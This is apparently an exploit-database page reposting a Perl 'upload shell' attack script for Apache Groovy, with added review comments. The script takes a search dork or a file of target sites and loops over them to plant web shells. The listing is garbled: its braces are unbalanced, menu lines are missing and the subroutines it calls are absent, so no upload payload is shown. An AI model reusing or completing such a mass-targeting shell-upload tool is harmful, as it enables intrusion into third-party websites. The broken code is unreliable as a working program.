





Apache Groovy Upload Shell With Perl

CVE Category Price Severity
CVE-XXXX-XXXX CWE-XX Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2018-02-09
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018020125

Below is a copy:

Apache Groovy Upload Shell With Perl
##############################################################################
#exploit author: Mr.Rm19
#09-02-2018
#Apache Groovy Upload Shell With Perl
#DORK: N/A
##################################################################################
# POC :
# #!/usr/bin/perl

#Copyright (c) 2018 - Mr.Rm19

use LWP::UserAgent;
use HTTP::Request::Common;
use Term::ANSIColor;
use HTTP::Request::Common qw(GET);
# Shared HTTP client. $ag is a package global (no `my`, and the script has no
# `use strict`), so subroutines defined elsewhere in the script can reach it.
$ag = LWP::UserAgent->new();
# Fixed User-Agent string that embeds the author's handle. Any request made
# through $ag would carry this exact value, so it can serve as a search term in
# web-server access logs for traffic from an unmodified copy of this script.
$ag->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Mr.Rm19/20010801");
# Per-request timeout of 10 seconds.
$ag->timeout(10);


# Default target-list file name (package global). The option-3 branch further
# down declares its own `my $list`, which shadows this one inside that branch.
$list= "list.txt";
# Clear the terminal: `cls` on Windows, `clear` on everything else.
if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }

# Scalar-context localtime yields a human-readable date string; it is printed
# in the banner as the start time.
my $datetime    = localtime;

# `title` is a Windows cmd built-in. This call is not guarded by the $^O check,
# so on other systems the shell is asked to run a command named `title`.
system("title Mr.Rm19");
# Second screen clear; it repeats the one above.
if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }
# Switch terminal output to bold green for the ASCII-art banner that follows.
print color('bold green');





print q(
                     __          .gp.__/                            
                       .ssSSSSSs.__    d$P^^^"                             
                    .sSSSSSSS$$$$$$$p.dP                                   
                  .SSSSSS$$$$$SSSSSSSS$bs+._                               
                .SSSS$$$$$SSSSS$$$$$$$SS$$$$b__                       /"-. 
                SSS$$$SSSSS$$$$$$$$SSSS$$$SSSS$b                   _/"-. / 
               :S$$$SSSSS$$$$$$$SSSSS$$$SSSS$$SSb                 //   /"-.
               $$SSSSS$$$$$$SSSSS$$$$$$S$$$$S$$$Sb.               ;   /   /
               SSSSS$$$$$SSSSS$$$$$$$SS'P   SS$$S`^b._.'         /:  :   / 
               :S$$$$$SSSSS$$$$$$$SSSP      :$SS$b              / ;  +-./  
                $$$$SSSS$$$$$$$SSSSSP        S$SS$;            / /  / / ;  
               d$$SSS$$$$$SSSSSSSSS' ,=._    :S':S$           / /  / / /   
              :$SSS$$$$SSSSSSSSS^"  '  _ ";  ;   S$          / /  / / /    
              SSS$$$SSSP.-TSS^"     .="$;   /    S;         / /  / / /     
             :SS$$$SSS$$ (;            "    \    P         / /  / : :      
             :S$$$SS$$$$b :                  \ .'         / /  /  :  \     
              T$$SS$$$$$j`-,    .          ,  \         /"-(  /   ;_-.\    
               `TSS$$$$P   ;    `.         `.-'        /  /\\/   .'/_ ;;   
                 TS$$$P    :             _.-;         /  /\\(   / /-" ;;   
                  SSS'      \           :-t"         : .-\\/ "-/":   //    
                .SS$$        `.          `-;  Mr.Rm19    )Y   y   /  ;  J/     
               :S$$$;          "-.        (          '"; j_.-/-./.-" \_    
               $S$SS              "j.     :            :/  ':    `-..' \   
              d$$SS;     :        /  "-._.'             `.  ;       `-./;  
            _S$$$SP       \      :                        \: :"-.      \;  
          ,$$$SSSj       , `.    ;                         : ;   "-,   /   
          S$$SS'"^-...___       : "-.                      ;/      ;  t    
      __.-`SS'---. `T$$$$$$q._       "-.                  / `.    /   ;    
  .-""__ `.'      `. `T$$$$$$$$b.       `.               :    "--"   /     
 /.-""  \/          `. T$$$$$$$$$$p.     .`._            /"-.  _   .'      
::      /             \ T$$$$$SS$$$$$b._  `.T$p.        /    "" ;-'        
;;     :               \ T$$$S$$$$$$$$$$$p._L$$$$p.    /       ,           
;;     ;                \ $$$$$$$$$$$$$$$$$$$SS$$$$$. /                    
::     ;                 ;:$$$$$$$$$$$$$$SSSSSSSSS$$$y        '            
 ;;    :                  "^$$$$$$$$$$$$$$$$$SSSS$$$P        /             
 ;;     b.                   "^$$$$$$$$$$$$$$$$$S$$'        /              
 ::     :$$p.  -._              "^$$$$$$$$$$$$$$$'         /               
  ;;     $$$$$p.                   "^$$$$$$$$$$P          /                
  ::     :$$$$$$p.                    "^$$$$$$P          ,                 
   ;;     T$$$$$$$$p.                    "^$$P                             
   ::      T$$$$$$$P "-.                    "           '                  
   s;;      $$$$$$P   d$$p._                     /     /                   
  S$$:      $$$$$t   d$$$$$$$p._          "-.  .'     /                    
  SS$;;     :P^"\ \.d$$$$$$$$$$$$p._         ""      /                     
   TS::      \   d$$$$$$$$$$$$$$$$$$$p._            /                      
    SS.\     .jq$$$$$$$$$$$$$$$$$$^^^^^""-._      .';                      
   $$$$.tsssj' `T$$$$$$$^^^^^"""            "-._.'  ;                      
   $$$SSS         \                 /            \ :                       
   '^SSS_          \               :          :    :                       
     $$$SS.         \              ;          :    ;                       
     '$$$SS          \            :           ;   :                        
       "^S$.          \           ;          :    :                        
         S$$b.         \                     ;    ;                        
         S$$$$          ;                   :    :                         
         'TSS$$$s.      :                   ;    ;                         
             TS$$Ss_    ;                   ;   :                          
              `SSS$$$p./                   :    ;                          
                  TS$$'            ;       ;    :                          
                   "S              :       ;     ;                         
                   /                ;      :     :                         
                  /                 :            :                         
                 /"-.                          .' ;                        
                /    ""--..__          __..--""   :                        
                             """"""""""                                    


);

# Reset colours, then print the credit lines and the start time on a red background.
print color('reset');
print "                       ";
print colored ("[ Mr.Rm19  ]",'white on_red');  
print colored ("[ Coded By Mr.Rm19 ]\n",'white on_red');
print "                           ";
print colored ("[ Start At $datetime ]",'white on_red'),"\n\n";

# Menu entry 1, the only entry that has a label.
print color('bold red'),"[";
print color('bold green'),"1";
print color('bold red'),"] ";
print color("bold white"),"upload shel?     |> yes\n";
# Menu entry 2: the number is printed, but instead of a label there is a second
# closing bracket. NOTE(review): looks like lines were lost from this copy.
print color('bold red'),"[";
print color('bold green'),"2";
print color('bold red'),"] ";
print color('bold red'),"] ";
print color("bold white"),"Choose Number : ";
# Read the operator's menu choice; it is compared as a string ('1', '2', '3')
# by the branches below. No option 3 is shown in the menu above.
my $targett = <STDIN>;
chomp $targett;

# Option 1: ask the operator for a "dork" (a search-engine query string) and
# hand control to gassonee().
if($targett eq '1')
{
print color('bold red'),"[";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"[Sites?  ]\n";
print color('bold red'),"[";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white"),"Give Me Dork:";
# $dork is a package global; spaces become '+' (the form used in URL query strings).
$dork=<STDIN>;
chomp($dork);
$dork=~s/ /+/g;
# NOTE(review): gassonee() is not defined anywhere in the visible listing, and
# $dork is not read again in the visible code, so what is done with the query
# cannot be determined from this page.
gassonee();
}

# NOTE(review): from here to the end the listing is damaged. Braces are opened
# and never closed, and the subroutines it calls (get(), and gassonee() above)
# do not appear. As captured, the visible code only draws a menu and reads a
# target list: no HTTP request, upload path or payload is shown, so the
# "upload shell" claim in the title cannot be checked against this page and no
# request signature can be derived from it.

# Option 2: prints a "[+] " prefix and nothing else; the rest of the branch is
# missing (five braces opened, one closed).
if($targett eq '2')
{
print color('bold red'),"[";
print color('bold green'),"+";
print color('bold red'),"] ";
{
{ { 
{

}


# Option 3 (not offered in the menu): read a file of targets and call get()
# once per entry.
if($targett eq '3')
{
print color('bold red'),"[";
print color('bold green'),"+";
print color('bold red'),"] ";
print color('bold red'),"[";
print color('bold green'),"+";
print color('bold red'),"] ";
print color("bold white")," Path to your websites list:";
# Lexical $list shadows the global "list.txt" default set near the top.
my $list=<STDIN>;
chomp($list);
# Two-argument open with a bareword handle: the operator-typed path is
# interpolated into the mode string. The die message ("gAGaL", Indonesian
# "gagal" = "failed") does not include $!, so the reason for a failure is lost.
        open (THETARGET, "<$list") || die "[-] gAGaL";
# Slurp every line of the file into the global @TARGETS.
@TARGETS = <THETARGET>;
close THETARGET;
# Number of entries read; not referenced again in the visible code.
$link=$#TARGETS + 1;



# The OUTER label is not referenced by any next/last in the visible code.
OUTER: foreach $tofuck(@TARGETS){
chomp($tofuck);
# Unanchored match with a greedy capture: for an entry containing "http://" and a
# later "/", the loop variable is replaced by everything between "http://" and
# the LAST "/" on the line. Entries without that shape (including "https://"
# ones) are left unchanged.
if($tofuck =~ /http:\/\/(.*)\//) {
$tofuck= $1;
# get() is called with no arguments in both branches; presumably it reads the
# global $tofuck, but it is not defined in the visible listing, so confirm
# against a complete copy.
get();
}else{
get();
}

}

# Redundant second chomp of the list path, followed by stray unbalanced braces;
# the listing ends here without any subroutine definitions.
chomp($list); 
{
{
}
;

friend : c4ur un!onb4se 008 ./uzumak1 hacker sakit hati w4uw1k 190102 !0nt!5
